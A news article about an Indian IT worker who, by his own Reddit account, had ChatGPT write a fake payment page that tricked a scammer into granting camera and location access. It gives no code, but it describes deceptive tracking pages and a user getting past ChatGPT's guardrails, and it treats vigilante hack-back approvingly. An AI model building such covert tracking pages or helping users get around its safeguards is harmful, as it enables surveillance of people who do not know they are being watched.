How an AI Wiz Used ChatGPT to Turn the Tables on a Scammer

CN
Decrypt
Follow
1 hour ago

When a message popped up on his phone from a number claiming to be from a former college contact, a Delhi-based information technology professional was initially intrigued. The sender, posing as an Indian Administrative Service officer, claimed a friend in the paramilitary forces was being transferred and needed to liquidate high-end furniture and appliances "dirt cheap."


It was a classic "army transfer" fraud, a pervasive digital grift in India. But instead of blocking the number or falling victim to the scheme, the target claims that he decided to turn the tables using the very technology often accused of aiding cybercriminals: artificial intelligence.


Scamming a scammer


According to a detailed account posted on Reddit, the user, known by the handle u/RailfanHS, used OpenAI’s ChatGPT to "vibe code" a tracking website. The trap successfully harvested the scammer's location and a photograph of his face, leading to a dramatic digital confrontation where the fraudster reportedly begged for mercy.


While the identity of the Reddit user could not be independently verified, and the specific individual remains anonymous, the technical method described in the post has been scrutinized and validated by the platform's community of developers and AI enthusiasts.


The incident highlights a growing trend of "scambaiting"—vigilante justice where tech-savvy people bait fraudsters to waste their time or expose their operations—evolving with the aid of generative AI.





The encounter, which was widely publicized in India, began with a familiar script. The scammer sent photos of goods and a QR code, demanding an upfront payment. Feigning technical difficulties with the scan, u/RailfanHS turned to ChatGPT.


He fed the AI chatbot a prompt to generate a functional webpage designed to mimic a payment portal. The code, described as an "80-line PHP webpage," was secretly designed to capture the visitor's GPS coordinates, IP address, and a front-camera snapshot.


The tracking mechanism relied in part on social engineering as much as a software exploit. To circumvent browser security features that typically block silent camera access, the user told the scammer he needed to upload the QR code to the link to "expedite the payment process." When the scammer visited the site and clicked a button to upload the image, the browser prompted him to allow camera and location access—permissions he unwittingly granted in his haste to secure the funds.



Image: RailfanHS on Reddit

"Driven by greed, haste, and completely trusting the appearance of a transaction portal, he clicked the link," u/RailfanHS wrote in the thread on the r/delhi subreddit. "I instantly received his live GPS coordinates, his IP address, and, most satisfyingly, a clear, front-camera snapshot of him sitting."


The retaliation was swift. The IT professional sent the harvested data back to the scammer. The effect, according to the post, was immediate panic. The fraudster’s phone lines flooded the user with calls, followed by messages pleading for forgiveness and promising to abandon his life of crime.


"He was now pleading, insisting he would abandon this line of work entirely and desperately asking for another chance," RailfanHS wrote. "Needless to say, he would very well be scamming someone the very next hour, but boy the satisfaction of stealing from a thief is crazy."


Redditors verify the approach


While dramatic tales of internet justice often invite skepticism, the technical underpinnings of this sting were verified by other users in the thread. A user with the handle u/BumbleB3333 reported successfully replicating the "dummy HTML webpage" using ChatGPT. They noted that while the AI has guardrails against creating malicious code for silent surveillance, it readily generates code for legitimate-looking sites that request user permissions—which is exactly how the scammer was trapped.


"I was able to make a sort of a dummy HTML webpage with ChatGPT. It does capture geolocation when an image is uploaded after asking for permission," u/BumbleB3333 commented, confirming the plausibility of the hack. Another user, u/STOP_DOWNVOTING, claimed to have generated an "ethical version" of the code that could be modified to function similarly.


The original poster, who identified himself in the comments as an AI product manager, acknowledged that he had to use specific prompts to bypass some of ChatGPT's safety restrictions. "I'm sort of used to bypassing these guardrails with right prompts," he noted, adding that he hosted the script on a virtual private server.


Cybersecurity experts caution that while such "hack-backs" are satisfying, they operate in a legal grey area and can carry risks. Still, it's pretty tempting—and makes for a satisfying spectator sport.


免责声明:本文章仅代表作者个人观点,不代表本平台的立场和观点。本文章仅供信息分享,不构成对任何人的任何投资建议。用户与作者之间的任何争议,与本平台无关。如网页中刊载的文章或图片涉及侵权,请提供相关的权利证明和身份证明发送邮件到support@aicoin.com,本平台相关工作人员将会进行核查。

Share To
APP

X

Telegram

Facebook

Reddit

CopyLink